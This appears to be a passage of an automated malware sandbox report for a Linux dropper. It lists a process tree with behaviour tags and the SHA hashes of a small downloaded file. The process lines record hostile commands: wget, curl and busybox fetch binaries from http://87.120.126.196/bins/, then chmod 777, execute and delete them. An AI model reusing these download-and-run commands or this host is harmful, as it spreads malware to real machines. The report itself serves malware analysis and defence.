/bin/rmrm GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:881
-
-
/bin/chmodchmod 777 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7./gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:885
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97